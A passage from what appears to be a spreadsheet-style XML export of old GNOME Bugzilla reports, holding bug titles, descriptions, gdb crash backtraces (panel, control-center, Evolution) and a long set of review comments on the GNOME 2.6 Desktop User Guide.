auto create desktop setting and holding Ctrl+ arrow for a short while.
Debugging information:
0x405a08e9 in ?? ()
#0  0x405a08e9 in ?? ()
#1  0x4015c131 in ?? ()
#2  
#3  0xfe90a58d in ?? ()
#4  0x400a44f9 in ?? ()
#5  0x400613f1 in ?? ()
#6  0x400285d8 in ?? ()
#7  0x8075653 in ?? ()
#8  0x40029c3d in ?? ()
#9  0x4005f776 in ?? ()
#10 0x4006189d in ?? ()
#11 0x40061a8e in ?? ()
#12 0x4007ed3e in ?? ()
#13 0x400ed277 in ?? ()
#14 0x40099aca in ?? ()
#15 0x4009b186 in ?? ()
#16 0x4009b751 in ?? ()
#17 0x4009b8f1 in ?? ()
#18 0x4029c919 in ?? ()
#19 0x805591e in ?? ()
#20 0x405279cb in ?? ()
#0  0x405a08e9 in ?? ()
No symbol table info available.
#1  0x4015c131 in ?? ()
No symbol table info available.
#2  
No symbol table info available.
#3  0xfe90a58d in ?? ()
No symbol table info available.
#4  0x400a44f9 in ?? ()
No symbol table info available.
#5  0x400613f1 in ?? ()
No symbol table info available.
#6  0x400285d8 in ?? ()
No symbol table info available.
#7  0x8075653 in ?? ()
No symbol table info available.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 13:14 -------
This bug was previously known as bug 22356 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=22356
Originally filed under the gnome-core product and panel component.
Unknown version 1.2.x in product gnome-core. Setting version to the default unspecified.
The original reporter (daniel.lindh@codefactory.se) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>daniel.lindh</t>
  </si>
  <si>
    <t>GFTP-157288</t>
  </si>
  <si>
    <t>Could not parse file '/usr/share/applications/gftp.desktop'</t>
  </si>
  <si>
    <t>Could not parse file '/usr/share/applications/gftp.desktop': desktop entry
contain line 'Desktop Entry]' which is not an entry group or comment
in http://cvs.gnome.org/viewcvs/gftp/docs/gftp.desktop?rev=1.3&amp;view=auto
Desktop Entry]
must be:
[Desktop Entry]</t>
  </si>
  <si>
    <t>TOTEM-422838</t>
  </si>
  <si>
    <t>media device cleanup</t>
  </si>
  <si>
    <t>I removed bacon_video_widget_set_media_device and instead the device is passed as an argument to bvw_get_mrls. The GStreamer code could be simplified using this.</t>
  </si>
  <si>
    <t>GNOME-MEDIA-90788</t>
  </si>
  <si>
    <t>CDDBSlave2</t>
  </si>
  <si>
    <t>cddb-slave2-properties capplet should instant-apply preference changes</t>
  </si>
  <si>
    <t>The CDDB settings control panel (cddb-slave2-properties) does not instantly
apply settings changes.  Instead settings are only updated when the user
presses the Apply button.  If the user presses Close instead changed
settings are not stored back into gconf.</t>
  </si>
  <si>
    <t>GOSSIP-136484</t>
  </si>
  <si>
    <t>ver 0.7.2 doesn't change icon when new msg appear</t>
  </si>
  <si>
    <t>when i walk away from comp. gossip change status to away and when i'm back
 status backs to my previous icon in notification area doesn't notify
that i have new msgs ( but when i click it works correct ( chat window
popup )  to be notified again by this icon i have to change my status (
can be the same as was ) by my hand
more clear :
- leave comp. let gossip change status to Away
- new msg arrive
- come back to comp. let gossip change status to you previous
- icon in notification area doesn't notify about new msg
notification about new msgs doesn't work until you change status by hand 
heh i think you can understand that...</t>
  </si>
  <si>
    <t>seeder</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-54590</t>
  </si>
  <si>
    <t>Most of my configuration applets are crashing</t>
  </si>
  <si>
    <t xml:space="preserve">Package: control-center
Severity: major
Version: 1.4.0.2
Synopsis: Most of my configuration applets are crashing
Bugzilla-Product: control-center
Bugzilla-Component: general
Description:
This latest comes from selecting panel in the Control Center but I get a segfault whenever I try to run the theme selector the mouse config or just about any other GNOME configuration tool.  I tried blowing away ~/.gnome and starting from scratch but that made matters worse or so it seems.
Debugging Information:
(no debugging symbols found)...(no debugging symbols found)...
0x40590589 in __wait4 () from /lib/i686/libc.so.6
#0  0x40590589 in __wait4 () from /lib/i686/libc.so.6
#1  0x405ff4a4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x4009d28a in gnome_segv_handle (signum=11) at gnome-init.c:659
#3  
#4  0x40639b24 in ?? ()
#5  0x402ac221 in gdk_window_show (window=0x8069e08) at gdkwindow.c:756
#6  0x4023c846 in gtk_viewport_realize (widget=0x8069d40) at gtkviewport.c:495
#7  0x401e2a03 in gtk_marshal_NONE__NONE (object=0x8069d40 
    func=0x4023c584  func_data=0x0 args=0xbfffed98)
    at gtkmarshal.c:312
#8  0x402113e3 in gtk_signal_real_emit (object=0x8069d40 signal_id=12 
    params=0xbfffed98) at gtksignal.c:1440
#9  0x4020f5ac in gtk_signal_emit (object=0x8069d40 signal_id=12)
    at gtksignal.c:552
#10 0x40243e3c in gtk_widget_realize (widget=0x8069d40) at gtkwidget.c:1655
#11 0x4020cd71 in gtk_scrolled_window_add (container=0x80d0c38 
    child=0x8069d40) at gtkscrolledwindow.c:914
#12 0x401e2925 in gtk_marshal_NONE__POINTER (object=0x80d0c38 
    func=0x4020cc98  func_data=0x0 args=0xbffff148)
    at gtkmarshal.c:193
#13 0x402113e3 in gtk_signal_real_emit (object=0x80d0c38 signal_id=61 
    params=0xbffff148) at gtksignal.c:1440
#14 0x4020f5ac in gtk_signal_emit (object=0x80d0c38 signal_id=61)
    at gtksignal.c:552
#15 0x401a0068 in gtk_container_add (container=0x80d0c38 widget=0x8069d40)
    at gtkcontainer.c:719
#16 0x4020d09d in gtk_scrolled_window_add_with_viewport (
    scrolled_window=0x80d0c38 child=0x8069a80) at gtkscrolledwindow.c:967
#17 0x4019de30 in gtk_combo_init (combo=0x80c7118) at gtkcombo.c:750
#18 0x40238591 in gtk_type_new (type=54805) at gtktypeutils.c:391
#19 0x4008b510 in gnome_entry_new (history_id=0x0) at gnome-entry.c:130
#20 0x4008c7d7 in gnome_file_entry_init (fentry=0x80c7058)
    at gnome-file-entry.c:266
#21 0x402385e6 in gtk_type_new (type=54293) at gtktypeutils.c:399
#22 0x4008cb1c in gnome_file_entry_new (history_id=0x0 
    browse_dialog_title=0x0) at gnome-file-entry.c:348
#23 0x4009c3bf in gnome_icon_entry_init (ientry=0x80c65f0)
    at gnome-icon-entry.c:576
#24 0x402385e6 in gtk_type_new (type=53781) at gtktypeutils.c:399
#25 0x4009c519 in gnome_icon_entry_new (history_id=0x805cd1d tile_file 
    browse_dialog_title=0x805d9ac Browse) at gnome-icon-entry.c:618
#26 0x8053cbc in create_icon_entry () at eval.c:41
#27 0x805069a in transform_pixbuf () at eval.c:41
#28 0x8050aa8 in transform_pixbuf () at eval.c:41
#29 0x8053570 in transform_pixbuf () at eval.c:41
#30 0x8053889 in main () at eval.c:41
#31 0x404f2167 in __libc_start_main (main=0x80537f8  argc=3 
    ubp_av=0xbffff79c init=0x804dccc  fini=0x805caac  
    rtld_fini=0x4000e0e4  stack_end=0xbffff794)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40590589 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x405ff4a4 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x4009d28a in gnome_segv_handle (signum=11) at gnome-init.c:659
estatus = 1076370424
in_segv = 1
pid = 0
#3  
No locals.
#4  0x40639b24 in ?? ()
No symbol table info available.
#5  0x402ac221 in gdk_window_show (window=0x8069e08) at gdkwindow.c:756
window = (GdkWindow *) 0x8069e08
#6  0x4023c846 in gtk_viewport_realize (widget=0x8069d40) at gtkviewport.c:495
widget = (GtkWidget *) 0x8069d40
attributes = {title = 0x80d0c38 @\n\r\bh\a\001 event_mask = 2 x = 0 
  y = 0 width = 1 height = 1 wclass = GDK_INPUT_OUTPUT visual = 0x80769e0 
  colormap = 0x809a700 window_type = GDK_WINDOW_CHILD cursor = 0x15 
  wmclass_name = 0xb715  
  wmclass_class = 0x80bcc08 style-set override_redirect = 1075912254}
event_mask = 2
border_width = 134651344
#7  0x401e2a03 in gtk_marshal_NONE__NONE (object=0x8069d40 
    func=0x4023c584  func_data=0x0 args=0xbfffed98)
    at gtkmarshal.c:312
No locals.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-05-13 16:42 -------
The original reporter (mjinks@sysvi.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component control-center-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>mjinks</t>
  </si>
  <si>
    <t>GNOME-POWER-MANAGER-496137</t>
  </si>
  <si>
    <t>g-p-m doesn't start when associated device not present</t>
  </si>
  <si>
    <t>Please describe the problem:
G-P-M gives the status of my Mobile Phone battery (in conjunction with gnome-phone-manager I think) but if the phone is not present G-P-M exits and doesn't run as expected. This happens on every login as the gnome bluetooth applet takes a while to start up and find the phone. If you later start it manually in runs OK. If the phone is not available at all (ie not in range of the laptop) G-P-M fails to start at all
Steps to reproduce:
1. Configure a phone using gnome-phone-manager using bluetooth
2. Check that the phone's battery status is reported through G-P-M
3. Turn off bluetooth on the phone so it can't associate
4. Logout/Login to X
5. Note G-P-M doesn't run.
Actual results:
G-P-M doesn't start and no icon appears in the notification tray
Expected results:
G-P-M should run whether the phone is present or not
Does this happen every time?
Yes
Other information:
I will attach the output of gnome-power-manager --verbose --no-daemon with some details</t>
  </si>
  <si>
    <t>pbrobinson</t>
  </si>
  <si>
    <t>GTK+-69528</t>
  </si>
  <si>
    <t>Unable to get keyboard navigation to work with applets in panel</t>
  </si>
  <si>
    <t>I have a panel with two launchers on it. When I add an applet (wanda) to
the panel I am unable to get keyboard navigation to work. 
The has_focus flag onthe panel's GtkWindow is unset when the applet is
added and I cannot find a way to reset it.
I think I also need to be able to pass keyboard focus from an object in the
panel through to the applet and manipulate the applet using the keyboard.</t>
  </si>
  <si>
    <t>GLIB-59654</t>
  </si>
  <si>
    <t>g_filename_to_uri does not error if hostname has illegal characters in it</t>
  </si>
  <si>
    <t>There's a test in uri-test.c that demonstrates this.
The / character will be inserted into the path.</t>
  </si>
  <si>
    <t>GIMP-158605</t>
  </si>
  <si>
    <t>Two help buttons</t>
  </si>
  <si>
    <t>Plugin/render/pattern/maze has two help buttons one for gimp-help and one for
its  homepage. They looks quite confusing.</t>
  </si>
  <si>
    <t>caiqian</t>
  </si>
  <si>
    <t>GNOME-USER-DOCS-136879</t>
  </si>
  <si>
    <t>GNOME 2.6 Desktop User Guide review comments</t>
  </si>
  <si>
    <t>Chapter 1
COMMENT 1: General Shortcut Keys
Alt + F1 - this doesn't appear to open the Main Menu any more but the
Applications menu in the Menu Bar applet. 
Chapter 2
COMMENT 2: Nautilus file manager bullet 5
You can use the file manager to manage your files and folders. This is
not a particularly helpful sentence.
COMMENT 3: Nautilus file manager bullet 5
The file manager enables you to browse and to navigate your files and
folders using the following two methods: 
Change to: You can access your files and folders in the following ways:
* Browse your files and folders
* Navigate your files and folders as objects
COMMENT 4: To Add Objects to Panels bullet 1 subbullets 2 and 3
Browse Filesystem and Terminal are not applets they are launchers. Delete
these two paragraphs.
COMMENT 5: To Give Focus to a Window
Table should also include the Window Selector applet as follows:
Window List ....
Window Selector Click on the Window Selector icon then select the window
that you want to give focus to from the list.
Workspace Switcher ....
Chapter 2
COMMENT 6: Nautilus File Manager sentence 2
Change navigate and access to access.
COMMENT 7: Nautilus File Manager sentences 3 and 4
I think you need to be careful with your terminology especially around the
differences between the two ways of accessing files and folders. I suggest
the following:
- Use file manager when referring to both the browse method and the
object method.
- Use file browser window to refer to the windows that you use when you
are using the browse method.
- Never use file browser manager or file browser manager window or
browser window.
- Use file object window to refer to the windows that you use when you
are using the object method.
- Never use file object manager or file object manager window or
object window.
The difference between the browse and object methods is potentially
confusing for users so you need to be quite rigid in your application of
terminology.
So change paragraphs 1-5 to:
The Nautilus file manager provides an integrated access point to your
files applications FTP sites and URIs. You can access your files and
folders in the following ways:
* Browse your files and folders
  You can use file browser windows to browse your files and folders. When
you open a file or folder in a file browser window the file or folder
opens in the window.
  File browser windows can contain the following panes: 
  Side pane Enables you to navigate through your files. This pane also
displays information about the current file or folder. The side pane is on
the left side of a file browser window. 
  View pane Displays the contents of files and folders. The view pane is on
the right side of file browser windows.
* Navigate your files and folders as objects
  The file manager can also represent your files and folders as individual
objects. Each file or folder is displayed in an individual file object
window. When you open files or folders from file object windows each file
or folder opens a new window.
COMMENT 8: Nautilus File Manager bullet 1
Change within a file manager window to within a file browser window.
Change from the file manager to from a file object window. Viewing a
file seems to be closer to file browsing and opening a file seems to be
closer to navigating as objects. I think it would be useful to emphasize
this concept even if you can open files from the file browser window also.
COMMENT 9: Nautilus File Manager bullet 4 subbullet 2
Change background pattern to background or pattern.
COMMENT 10: To View Files from the File Manager - new section
I think that you should just describe the browse method of viewing a file.
See COMMENT 7.
Add this section before To Open Files from the File Manager.
To browse to the file that you want to view choose Applications &gt; Browse
Filesystem. A file browser window opens. 
To access the folder where the file that you want to view resides
double-click on the folder icons in the view pane. When the file that you
want to view is displayed double-click on the file icon to view the file
in the file browser window.
COMMENT 11: To Open Files from the File Manager
I think that you should just describe the object method of opening a file.
See COMMENT 7. So update the text to the following: 
To navigate to the file that you want to open double-click on the Home
object on the desktop. A file object window opens. 
To navigate to the folder where the file that you want to open resides
double-click on the folder icons in the file object window. When the file
that you want to open is displayed double-click on the file icon to open
the file in an application.
COMMENT 12: To Move Files Between Folders para 2
Delete this paragraph the first paragraph applies to both browse and
object methods.
COMMENT 13: Start Here location screenshot
Needs to be updated.
COMMENT 14: Start Here location bullet 4
It is not possible to choose Go &gt; Start Here unless Start Here is already
in your history list. I think you need to change the para under the bullet
to Access the start-here:/// URI in a file manager window.
Chapter 3
COMMENT 15: Ending a Session bullet 2
Should name be replaced with username?
Chapter 4
COMMENT 16: Top Edge Panel screenshot
The screenshot has the old file manager icon.
COMMENT 17: Top Edge Panel table row 2
Change the first column to File browser launcher. Change file browser
manager window to file browser window in the second column.
COMMENT 18: Top Edge Panel table row 6
Change window selector icon to Window
Selector icon. 
Change then choose the window to then select the window. 
COMMENT 19: To Add an Object to a Panel bullet 1 subbullet 2
Show Desktop button should be last in the list to follow the alphabetical
order of the menu. Also delete the space before the full stop.
COMMENT 20: Launchers bullet 4
Given that we are now using the term file browser window I suggest you
be more specific than browser that is Open a Web browser ...
COMMENT 21: To Create a Launcher With the Create Launcher Dialog step 2
table row 7
Change Run in Terminal to Run in terminal.
COMMENT 22: Launcher Commands row 3
I think you can restore the third row as follows:
nautilus /user123/Projects Opens the folder /user123/Projects in a file
object window.
Chapter 5
COMMENT 23: Menu Item Popup Menu Figure 5-1
Screenshot needs to be updated.
COMMENT 24: Menu Item Popup Menu Table 5-1 row 4
The Help on application-name menu item seems to be gone.
COMMENT 25: Actions Menu Table 5-2
The Lock screen menu item seems to be missing here. Add the following
before row 5:
Lock Screen Locks your screen. 
COMMENT 26: Using the Run Application Dialog step 1 bullet 4
Insert space between F2.You.
COMMENT 27: Using the Run Application Dialog step 2
Show list of known applications needs to be in guilabel tag.
COMMENT 28: Using the Run Application Dialog steps 2 and 3
Steps 2 and 3 are not left-aligned with step 1. 
COMMENT 29: To Take a Screenshot bullet 3
Save screenshot to webpage option is not documented.
COMMENT 30: To Open the Main Menu bullet 2
This is not true anymore. Delete this bullet and incorporate the
information in the previous bullet to the Main Menu section above it.
COMMENT 31: Customizing Your Menus para starting To access menus ...
I think that you can rewrite this paragraph the table and the following
paragraph so that you talk generally about the file manager and do not get
into browse/object differences. For example change To access menus in the
file browser manager enter one of the following URIs in the field on the
location bar: to To access menus in the file manager access one of the
following URIs in the file manager:. Then delete the paragraph after the
table.
COMMENT 32: To Add a Menu step 1
A similar comment to the previous one - avoid dealing with browse/object
differences here so change In a file manager window access the location
where you want to add the menu. For example if you want to add a menu to
the Applications menu enter applications:/// in the field on the location
bar from a file browser manager window. to In a file manager window
access the location where you want to add the menu. For example if you
want to add a menu to the Applications menu access the  applications:///
URI.
COMMENT 33: To Add a Menu step 2
View pane is a file browser window-specific concept. Change An untitled
folder is added to the view pane. to An untitled folder is added to the
menu.
COMMENT 34: To Copy a Launcher to a Menu step 1
Again avoid dealing with browse/object differences here so change In a
file manager window access the location where you want to add the menu.
For example if you want to copy a launcher from the Applications menu
enter applications:/// in the field on the location bar from a file browser
manager window. to In a file manager window access the location from
which you want to copy a launcher. For example if you want to copy a
launcher from the Applications menu access the  applications:/// URI.
Chapter 6
COMMENT 35: Types of Window screenshot 2
Needs to be updated.
COMMENT 36: Control Elements Table 6-1 row 2 bullet 3
Shade/Unshade does not appear to be the default action. It seems to have
changed to Maximize/Unmaximize. This option is set in the Windows
preference tool. So you need to change To shade the window double-click
on the titlebar. To unshade the window double-click on the titlebar
again. to To maximize the window double-click on the titlebar. To
restore the window to the previous size double-click on the titlebar
again.
You might want to check whether the default double-click action is likely
to change again before GNOME 2.6 before implementing this change.
Note also that shade is not exactly the same as roll up so don't use shade
where you mean roll up. See the GDSG Recommended Terminology for
explanations of these terms.
COMMENT 37: Window Menu Table 6-2 row 7
If the window is already on the workspace to the right of your workspace
choose Move to Workspace Left to move the window to the workspace to the
left of the current workspace. I find it difficult to understand this
sentence. Try If the window is already in the last workspace at the right
of the Workspace Switcher choose Move to Workspace Left to move the window
to the workspace to the left of the current workspace.
COMMENT 38: Window Menu Table 6-2 row 8
Workspace 1 2 3 and 4 are just the default workspace names. You can
rename them in the Workspace Switcher Preferences dialog. So I think it
would be best not to list them here. Instead say Moves the window to
another workspace. Select the workspace to which you want to move the
window from the submenu.
COMMENT 39: Window Menu Table 6-2
There appears to be an empty row at the end of this table.
COMMENT 40: Window List Applet para starting You can also ...
The sentence When you open the Window Menu from Window List the Window
Menu does not contain the workspace commands. does not appear to be true
anymore. Delete this sentence.
COMMENT 41: Grouping Buttons para 3
Change click on the item in the list to point to the item in the list.
COMMENT 42: Grouping Buttons para 3
The sentence When you open the Window Menu from the Window List the
Window Menu does not contain the workspace commands. does not appear to be
true anymore. Delete this sentence.
COMMENT 43: Window Selector Applet para 2
Make sure you always give Window Selector applet the proper applet title
and put it in application tags. Also the correct verb to use in this case
is select not choose (see GDSG Recommended Terminology). So change this
para to To give focus to a window select the window from the
Window Selector applet.
COMMENT 44: Window Selector Applet para 3 sentence 1
Again make sure you always give Window Selector applet the proper applet
title and put it in application tags. So change this sentence to
Window Selector lists the windows in all
workspaces.
COMMENT 45: To Give Focus to a Window table row 5
Change column 1 from Top edge panel to Window Selector (including
application tags). 
COMMENT 46: To Give Focus to a Window table row 5
Change column 2 to Click on the Window Selector icon. A list of your open
windows is displayed. Select the window from the list.
COMMENT 47: To Give Focus to a Window table row 5
It would be more logical if you moved this row above the Workspace Switcher
row (alphabetical ordering of the applets).
COMMENT 48: To Give Focus to a Window table row 5
Ensure that you delete any table rows that you empty not just the
contents.
COMMENT 49: To Minimize a Window To Maximize a Window To Restore a
Window To Close a Window To Resize a Window To Move a Window To Roll Up
a Window
All of these sections contain sentences with this structure: To
 perform one of the following actions:. Add a comma before
perform. For example change To minimize a window perform one of the
following actions: to To minimize a window perform one of the following
actions:.
COMMENT 50: To Place A Window on Top of Other Windows title
There is no need to uppercase a in this title. Change to To Place a
Window on Top of Other Windows.
COMMENT 51: To Place A Window on Top of Other Windows bullet 1
You can perform this action from all windows not just file manager
windows. So change this bullet to Open the Window Menu. Choose On Top.
COMMENT 52: To Place A Window on Top of Other Windows bullet 2
There is no On Top menu item in the Window Menu that is displayed from the
Window List. Perhaps this functionality is incomplete. In any case you
cannot do this actio so you need to either establish whether the plan is
to make this work or delete this bullet.
COMMENT 53: To Roll Up a Window bullet 1
Change You must select Roll up in the Window Preferences dialog to perform
this action. to To perform this action you must set the
Double-click titlebar to perform this action option to
Roll up in the Windows
preference tool.
Note that I say Windows ***preference tool*** rather than dialog.
Preference tools are a distinct concept in GNOME users know that they can
get them from the Desktop Preferences menu. Dialogs can be opened from any
application.
If this is not default functionality I wonder if we should document it at
all?
COMMENT 54: To Move a Window to Another Workspace bullet 2
Change this bullet to Open the Window Menu. To move the
window to another workspace choose Move to Workspace
Right or Move to Workspace Left.
Alternatively choose Move to Another
Workspaceworkspace-name.</t>
  </si>
  <si>
    <t>T.Thiessens</t>
  </si>
  <si>
    <t>eugene.oconnor</t>
  </si>
  <si>
    <t>EVOLUTION-207640</t>
  </si>
  <si>
    <t>Crash: default imap account vanished from folders</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.12.99
Synopsis: default imap account vanished from folders
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
default imap account vanished from folders when disabled it and attempt
to put it back ...
Debugging Information:
[New Thread 1024 (LWP 30054)]
[New Thread 2049 (LWP 30073)]
[New Thread 1026 (LWP 30074)]
[New Thread 3076 (LWP 30076)]
[New Thread 6151 (LWP 30079)]
0x40a02519 in __wait4 () from /lib/i686/libc.so.6
#0  0x40a02519 in __wait4 () from /lib/i686/libc.so.6
#1  0x40a729e4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x406b5563 in waitpid (pid=30080 stat_loc=0xbfffe74c options=0)
    at wrapsyscall.c:172
#3  0x402e3262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x080951ca in segv_redirect (sig=11) at main.c:67
#5  0x406b3935 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 135544360 esi = 12 ebp = 3221220128 esp = 3221220116 ebx = 135544456 edx = 11 ecx = 12 eax = 4294967292 trapno = 0 err = 0 eip = 1084387879 cs = 35 __csh = 0 eflags = 534 esp_at_signal = 3221220116 ss = 43 __ssh = 0 fpstate = 0xbfffe898 oldmask = 2147483648 cr2 = 0}) at signals.c:97
#6  
#7  0x40a27227 in __poll (fds=0x8143e28 nfds=12 timeout=95)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#8  0x40575a74 in g_main_poll (timeout=95 use_priority=0 priority=0)
    at gmain.c:1034
#9  0x40575465 in g_main_iterate (block=1 dispatch=1) at gmain.c:808
#10 0x40575725 in g_main_iteration (block=1) at gmain.c:907
#11 0x4048a89b in gtk_main_iteration () at gtkmain.c:603
#12 0x0808c1e6 in mail_msg_wait (msgid=9) at mail-mt.c:223
#13 0x4048be84 in gtk_marshal_NONE__POINTER_POINTER (object=0x814c7a0 
    func=0x808b17c  func_data=0x814c4c8 
    args=0xbfffed08) at gtkmarshal.c:340
#14 0x404bb56a in gtk_handlers_run (handlers=0x80eed50 signal=0xbfffeca8 
    object=0x814c7a0 params=0xbfffed08 after=0) at gtksignal.c:1917
#15 0x404ba9bb in gtk_signal_real_emit (object=0x814c7a0 signal_id=106 
    params=0xbfffed08) at gtksignal.c:1477
#16 0x404b8a30 in gtk_signal_emit (object=0x814c7a0 signal_id=106)
    at gtksignal.c:552
#17 0x406ea80d in impl_GNOME_Evolution_StorageListener_notifyFolderCreated (
    servant=0x814c7c8 path=0x81478ec /Vendors/WebCT folder=0xbfffeff8 
    ev=0xbffff068) at evolution-storage-listener.c:92
#18 0x406d4cc9 in _ORBIT_skel_GNOME_Evolution_StorageListener_notifyFolderCreated (_ORBIT_servant=0x814c7c8 _ORBIT_recv_buffer=0x813a6e8 ev=0xbffff068 
    _impl_notifyFolderCreated=0x406ea7bc ) at Evolution-skels.c:5064
#19 0x40814146 in ORBit_POA_handle_request (recv_buffer=0x813a6e8 
    poa=0x81325d8) at orbit_poa.c:507
#20 0x40817193 in ORBit_handle_incoming_request (recv_buffer=0x813a6e8)
    at server.c:90
#21 0x4081748b in ORBit_handle_incoming_message (recv_buffer=0x813a6e8)
    at server.c:160
#22 0x4083109e in giop_recv_reply_buffer_use_multiple_2 (
    request_cnx=0x813da48 request_ids=0xbffff170 block_for_reply=1)
    at giop-msg-buffer.c:1026
#23 0x4083115b in giop_recv_reply_buffer_use_2 (request_cnx=0x813da48 
    request_id=3221221784 block_for_reply=1) at giop-msg-buffer.c:1062
#24 0x406e11ed in GNOME_Evolution_Storage_addListener (_obj=0x8149200 
    listener=0x814b578 ev=0xbffff1d8) at Evolution-stubs.c:7532
#25 0x0808b535 in mail_local_storage_startup (shellclient=0x813d9f0 
    evolution_path=0x813db18 /home/mgrte/evolution) at mail-local.c:699
#26 0x0806c261 in owner_set_cb (shell_component=0x813c928 
    shell_client=0x813d9f0 
    evolution_homedir=0x813d874 /home/mgrte/evolution user_data=0x0)
    at component-factory.c:626
#27 0x4048be84 in gtk_marshal_NONE__POINTER_POINTER (object=0x813c928 
    func=0x806c1e0  func_data=0x0 args=0xbffff318)
    at gtkmarshal.c:340
#28 0x404bb56a in gtk_handlers_run (handlers=0x80eef70 signal=0xbffff2b8 
    object=0x813c928 params=0xbffff318 after=0) at gtksignal.c:1917
#29 0x404ba9bb in gtk_signal_real_emit (object=0x813c928 signal_id=97 
    params=0xbffff318) at gtksignal.c:1477
#30 0x404b8a30 in gtk_signal_emit (object=0x813c928 signal_id=97)
    at gtksignal.c:552
#31 0x406e8878 in impl_setOwner (servant=0x813c984 shell=0x813d248 
    evolution_homedir=0x813d874 /home/mgrte/evolution ev=0xbffff658)
    at evolution-shell-component.c:312
#32 0x406d207d in _ORBIT_skel_GNOME_Evolution_ShellComponent_setOwner (
    _ORBIT_servant=0x813c984 _ORBIT_recv_buffer=0x813a688 ev=0xbffff658 
    _impl_setOwner=0x406e87cc ) at Evolution-skels.c:1161
#33 0x40814146 in ORBit_POA_handle_request (recv_buffer=0x813a688 
    poa=0x81325d8) at orbit_poa.c:507
#34 0x40817193 in ORBit_handle_incoming_request (recv_buffer=0x813a688)
    at server.c:90
#35 0x4081748b in ORBit_handle_incoming_message (recv_buffer=0x813a688)
    at server.c:160
#36 0x4082fce4 in giop_main_handle_connection (connection=0x813d708)
    at connection.c:1211
#37 0x407d5955 in orb_handle_connection (source=0x813c018 cond=G_IO_IN 
    cnx=0x813d708) at oaf-mainloop.c:69
#38 0x40573a7a in g_io_unix_dispatch (source_data=0x813c030 
    current_time=0xbffff7f8 user_data=0x813d708) at giounix.c:137
#39 0x40575055 in g_main_dispatch (dispatch_time=0xbffff7f8) at gmain.c:656
#40 0x40575659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#41 0x405757e8 in g_main_run (loop=0x813a9b0) at gmain.c:935
#42 0x4048a65b in gtk_main () at gtkmain.c:524
#43 0x407a7547 in bonobo_main () at bonobo-main.c:283
#44 0x08095379 in main (argc=3 argv=0xbffffa1c) at main.c:141
#45 0x40964177 in __libc_start_main (main=0x80951f4  argc=3 
    ubp_av=0xbffffa1c init=0x8064a10  fini=0x80c819c  
    rtld_fini=0x4000e184  stack_end=0xbffffa14)
    at ../sysdeps/generic/libc-start.c:129
Thread 5 (Thread 6151 (LWP 30079)):
#0  0x409758a5 in __sigsuspend (set=0x43b878ac)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x406b30d9 in __pthread_wait_for_restart_signal (self=0x43b87c00)
    at pthread.c:934
#2  0x406b4d79 in __pthread_alt_lock (lock=0x4008e790 self=0x0)
    at restart.h:34
#3  0x406b1c86 in __pthread_mutex_lock (mutex=0x4008e780) at mutex.c:120
#4  0x4005ff2c in camel_type_lock_up () at camel-object.c:115
#5  0x40061645 in shared_is_of_type (sh=0x814b9a0 ctype=16 is_obj=1)
    at camel-object.c:906
#6  0x40060d9b in camel_object_is_of_type (obj=0x814b9a0 ctype=16)
    at camel-object.c:574
#7  0x4004cb41 in camel_folder_get_full_name (folder=0x814b9a0)
    at camel-folder.c:345
#8  0x080858f9 in get_mail_info_describe (msg=0x8162910 complete=0)
    at mail-folder-cache.c:481
#9  0x0808c359 in mail_msg_received (e=0x813b0e0 msg=0x8162910 data=0x0)
    at mail-mt.c:324
#10 0x4007d4df in thread_received_msg (e=0x813b0e0 m=0x8162910)
    at e-msgport.c:467
#11 0x4007d62b in thread_dispatch (din=0x813b0e0) at e-msgport.c:538
#12 0x406b0bfd in pthread_start_thread (arg=0x43b87c00) at manager.c:262
Thread 4 (Thread 3076 (LWP 30076)):
#0  0x409758a5 in __sigsuspend (set=0x423596fc)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x406b30d9 in __pthread_wait_for_restart_signal (self=0x42359c00)
    at pthread.c:934
#2  0x406b4d79 in __pthread_alt_lock (lock=0x4008e790 self=0x0)
    at restart.h:34
#3  0x406b1c86 in __pthread_mutex_lock (mutex=0x4008e780) at mutex.c:120
#4  0x4005ff2c in camel_type_lock_up () at camel-object.c:115
#5  0x40061645 in shared_is_of_type (sh=0x814ba00 ctype=1 is_obj=1)
    at camel-object.c:906
#6  0x40060dcd in camel_object_check_cast (obj=0x814ba00 ctype=1)
    at camel-object.c:592
#7  0x42b65e82 in camel_local_folder_construct (lf=0x814ba00 
    parent_store=0x8148530 full_name=0x8162ac8 mbox flags=3 ex=0x81479c0)
    at camel-local-folder.c:214
#8  0x42b68d2b in camel_mbox_folder_new (parent_store=0x8148530 
    full_name=0x8162ac8 mbox flags=3 ex=0x81479c0)
    at camel-mbox-folder.c:132
#9  0x42b699bd in get_folder (store=0x8148530 folder_name=0x8162ac8 mbox 
    flags=3 ex=0x81479c0) at camel-mbox-store.c:126
#10 0x4006d2bf in camel_store_get_folder (store=0x8148530 
    folder_name=0x8162ac8 mbox flags=3 ex=0x81479c0) at camel-store.c:220
#11 0x0808b09b in register_folder_register (mm=0x81479a8) at mail-local.c:495
#12 0x0808c39b in mail_msg_received (e=0x813b038 msg=0x81479a8 data=0x0)
    at mail-mt.c:334
#13 0x4007d4df in thread_received_msg (e=0x813b038 m=0x81479a8)
    at e-msgport.c:467
